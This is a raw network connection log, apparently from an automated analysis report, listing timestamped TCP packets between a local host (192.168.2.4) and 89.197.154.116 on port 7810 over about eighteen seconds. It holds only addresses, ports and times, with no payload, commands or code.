Oct 13, 2024 01:58:29.577756882 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.579003096 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.583010912 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.584258080 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.826828957 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.826903105 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.826940060 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.827161074 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.827404976 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.827405930 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.827428102 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.827486992 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.832681894 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.832756996 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.938057899 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.943474054 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.943685055 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.944015026 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.948945999 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:30.571958065 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:30.572168112 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:30.706356049 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:30.706599951 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:30.707159042 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:30.708631039 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:30.712340117 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:30.713577986 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:30.961731911 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:30.961779118 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:30.961905956 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:30.961905956 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:30.962227106 CEST  49758  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:30.967261076 CEST  7810   49758  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:31.081473112 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:31.087016106 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:31.087357044 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:31.087471962 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:31.092952013 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:31.688851118 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:31.689176083 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:31.825958014 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:31.826165915 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:31.826567888 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:31.828466892 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:31.831424952 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:31.833290100 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.073559046 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.073582888 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.073944092 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.073944092 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.074059010 CEST  49759  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.079212904 CEST  7810   49759  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.188333988 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.193732977 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.194071054 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.194489002 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.199872017 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.799097061 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.799508095 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.933603048 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.933932066 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.934420109 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.935802937 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:32.939460039 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:32.940655947 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:33.182704926 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:33.182769060 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:33.182796001 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:33.182862997 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:33.183238983 CEST  49760  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:33.188189030 CEST  7810   49760  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:33.299109936 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:33.303992033 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:33.304081917 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:33.304689884 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:33.309546947 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:33.903860092 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:33.903933048 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.032756090 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.032833099 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.033359051 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.034993887 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.038503885 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.039839029 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.281541109 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.281605005 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.281728029 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.281728983 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.281728983 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.282176971 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.282176971 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.282207012 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.287072897 CEST  7810   49761  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.287134886 CEST  49761  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.423461914 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.428482056 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:34.429749966 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.430136919 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:34.434956074 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.029555082 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.029834986 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.160996914 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.161194086 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.161612988 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.163218021 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.166851997 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.168293953 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.406922102 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.406970024 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.407135010 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.407135963 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.407444954 CEST  49762  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.412616968 CEST  7810   49762  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.516498089 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.521961927 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:35.522353888 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.522669077 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:35.527868032 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.122315884 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.122654915 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.257139921 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.257253885 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.257693052 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.258871078 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.262521029 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.263775110 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.505002975 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.505052090 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.505120993 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.505120993 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.505367041 CEST  49763  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.510735989 CEST  7810   49763  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.610198021 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.615103006 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:36.615350962 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.615685940 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:36.620543003 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.300599098 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.301018953 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.369307995 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.369729996 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.369935989 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.371063948 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.375231028 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.376019001 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.622072935 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.622111082 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.622147083 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.622452974 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.622452974 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.622710943 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.622710943 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.627664089 CEST  7810   49764  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.627856016 CEST  49764  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.734870911 CEST  49765  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.917330027 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:37.917524099 CEST  49765  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.918437004 CEST  49765  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:37.923552036 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:38.519359112 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:38.519500017 CEST  49765  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:38.649207115 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:38.649297953 CEST  49765  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:38.649759054 CEST  49765  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:38.651696920 CEST  49765  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:38.654977083 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:38.656685114 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:38.900099039 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:38.900146961 CEST  7810   49765  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:38.900176048 CEST  49765  7810   192.168.2.4     89.197.154.116
                                          Oct 13, 2024 01:58:38.900250912 CEST497657810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:38.900429964 CEST497657810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:38.905653954 CEST78104976589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:39.016227961 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:39.021765947 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:39.022016048 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:39.022274971 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:39.027857065 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:39.625077963 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:39.625319958 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:39.761519909 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:39.761831999 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:39.819417000 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:39.820425034 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:39.824846983 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:39.825414896 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.069747925 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.069793940 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.069827080 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.069987059 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.069987059 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.069987059 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.070204020 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.070236921 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.075325966 CEST78104976689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.075411081 CEST497667810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.172391891 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.180793047 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.180947065 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.181435108 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.189826965 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.793689013 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.793849945 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.926310062 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.926508904 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.927043915 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.928116083 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:40.931910992 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:40.932964087 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:41.176939011 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:41.176961899 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:41.177161932 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:41.177161932 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:41.177596092 CEST497677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:41.182415009 CEST78104976789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:41.281802893 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:41.286894083 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:41.287080050 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:41.287372112 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:41.292769909 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:41.917656898 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:41.917876959 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.058598042 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:42.058676004 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.059175968 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.060173988 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.064363956 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:42.065243959 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:42.314694881 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:42.314930916 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.314938068 CEST78104976889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:42.315120935 CEST497687810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.422878027 CEST497557810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.428940058 CEST78104975589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:42.430696011 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.436530113 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:42.436857939 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.438599110 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:42.443722010 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.054471970 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.054661989 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.168850899 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.169094086 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.169590950 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.170698881 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.174608946 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.175610065 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.418325901 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.418348074 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.418363094 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.418562889 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.418651104 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.419194937 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.419194937 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.424132109 CEST78104976989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.424355030 CEST497697810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.532598972 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.537801981 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:43.538089991 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.538479090 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:43.543651104 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.138037920 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.138422012 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.268953085 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.269453049 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.270020008 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.270939112 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.275160074 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.275890112 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.518237114 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.518275976 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.518346071 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.518347025 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.518529892 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.518590927 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.518717051 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.518749952 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.523483992 CEST78104977089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.523554087 CEST497707810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.625947952 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.631254911 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:44.633861065 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.634119987 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:44.639136076 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.245270967 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.245471954 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.376983881 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.377327919 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.377629995 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.378911972 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.382761955 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.383898020 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.627561092 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.627702951 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.627698898 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.627753019 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.627787113 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.627831936 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.628122091 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.628153086 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.632884979 CEST78104977189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.632977009 CEST497717810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.734857082 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.739674091 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:45.739742994 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.740031004 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:45.744869947 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.339534998 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.339597940 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.472842932 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.472908020 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.473314047 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.474476099 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.478136063 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.479244947 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.718071938 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.718092918 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.718216896 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.718907118 CEST497727810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.723773003 CEST78104977289.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.828890085 CEST497737810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.833807945 CEST78104977389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:46.833883047 CEST497737810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.834285975 CEST497737810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:46.839164019 CEST78104977389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:47.441395044 CEST78104977389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:47.441529989 CEST497737810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:47.574842930 CEST78104977389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:47.574947119 CEST497737810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:47.575510025 CEST497737810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:47.577229023 CEST497737810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:47.580239058 CEST78104977389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:47.582046986 CEST78104977389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:47.825898886 CEST78104977389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:47.825943947 CEST78104977389.197.154.116192.168.2.4
